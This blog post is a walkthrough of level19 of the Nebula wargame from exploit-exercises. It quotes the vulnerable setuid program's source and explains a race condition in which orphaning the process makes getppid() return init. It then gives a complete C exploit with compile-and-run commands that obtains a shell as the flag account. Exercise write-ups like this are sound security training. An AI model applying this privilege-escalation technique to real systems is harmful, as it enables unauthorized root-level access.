Friday, November 2, 2012

exploit-exercises Nebula: level19

In the last challenge of the Nebula wargame, we have the source code of a vulnerable binary.

snprintf(buf, sizeof(buf)-1, "/proc/%d", getppid());
/* stat() it */
if(stat(buf, &statbuf) == -1) {
printf("Unable to check parent process\n");
exit(EXIT_FAILURE);
}
/* check the owner id */
if(statbuf.st_uid == 0) {
/* If root started us, it is ok to start the shell */
execve("/bin/sh", argv, envp);
err(1, "Unable to execve");
}
printf("You are unauthorized to run this program\n");
the returned value of getppid() (which returns the pid of the parent of the calling process) is what defines whether we will get a shell or not. Investigating the getppid(), we find out that it returns the PID of init (i.e 1), and /proc/1 is owned by root. The vulnerability is thus, a race condition by letting the parent which called flag19 exiting before flag19 makes the getppid(). Let's exploit this vulnerability.

level19@nebula:~$ cat pwn19.c 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
    int p;
    p = fork();
    if (p == 0) {
sleep(1);
execl("/home/flag19/flag19", "/bin/sh", "-c", "/bin/getflag
> /tmp/pwnie19", (char *)NULL);
    }
    exit(0);
}
level19@nebula:~$ gcc pwn19.c
level19@nebula:~$ ./a.out
level19@nebula:~$ cat /tmp/pwnie19 

You have successfully executed getflag on a target account
And that is it, the end of Nebula wargame. Next :)

No comments:

Post a Comment